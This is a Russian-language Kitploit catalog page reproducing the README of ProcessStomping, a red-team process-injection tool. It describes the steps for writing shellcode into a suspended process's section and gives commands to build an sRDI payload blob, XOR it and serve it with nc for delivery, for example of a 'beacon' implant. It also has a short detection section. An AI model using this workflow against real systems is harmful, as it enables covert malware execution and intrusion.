Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ProcessStomping — Вариант ProcessOverwriting для выполнения шеллкода в секции исполняемого файла | Kitploit
Инструменты/GitHubGitHub/naksyn/processstomping
Шелл-кодПост-эксплуатацияОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubnaksyn/processstomping

ProcessStomping

Вариант ProcessOverwriting для выполнения шеллкода в секции исполняемого файла

Репозиторий
147272 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ProcessStomping

Вариант ProcessOverwriting для выполнения шелл-кода в секции исполняемого файла

Twitter

Что это

Более подробное объяснение можно прочитать в моем посте в блоге

Process Stomping — это вариант Process Overwriting от hasherezade. Его преимущество заключается в записи полезной нагрузки шелл-кода в целевую секцию, а не в записи целой PE-нагрузки в адресное пространство хост-процесса.

Основные шаги техники ProcessStomping:

  1. CreateProcess — установка флага создания процесса CREATE_SUSPENDED (0x00000004) для приостановки первичного потока процесса.
  2. WriteProcessMemory — используется для записи каждого вредоносного шелл-кода в целевую секцию процесса.
  3. SetThreadContext — используется для перенаправления точки входа на новую секцию кода, которая была записана.
  4. ResumeThread — самоочевидно.

В качестве примера применения техники PoC можно использовать с sRDI для загрузки beacon-библиотеки через RWX-секцию исполняемого файла. На следующем рисунке описаны задействованные шаги.

immagine

Отказ от ответственности

Вся информация и контент предоставляются только в образовательных целях. Следуйте инструкциям на свой страх и риск. Ни автор, ни его работодатель не несут ответственности за прямой или косвенный ущерб или потери, возникшие у какого-либо лица или организации.

Благодарности

Эта работа стала возможной благодаря знаниям и инструментам, которыми поделились Александра Донец @hasherezade и Ник Ландерс.

Использование

Выберите целевой процесс и измените соответствующие глобальные переменные в ProcessStomping.cpp.

Скомпилируйте проект sRDI, убедившись, что смещение достаточно для перехода через сгенерированный блоб sRDI-шелл-кода, затем обновите инструменты sRDI:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Сгенерируйте полезную нагрузку DLL без рефлексивного загрузчика по вашему выбору, затем создайте блоб sRDI-шелл-кода:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

Затем блоб шелл-кода можно заксорить с ключевым словом и загрузить через простой сокет:

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

Передайте заксоренный блоб при подключении:

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

Блоб sRDI будет удалён после выполнения для устранения ненужных артефактов.

Демо

https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50

Ограничения

Чтобы успешно выполнить эту технику, следует правильно выбрать целевой процесс и использовать полезную нагрузку DLL, которая не содержит пользовательского рефлексивного загрузчика.

Возможности обнаружения

Техника Process Stomping требует запуска целевого процесса в приостановленном состоянии, изменения точки входа потока и последующего возобновления потока для выполнения внедрённого шелл-кода. Эти операции могут считаться подозрительными, если выполняются быстро одна за другой, и могут привести к повышенному вниманию со стороны некоторых решений безопасности.

Скачать инструмент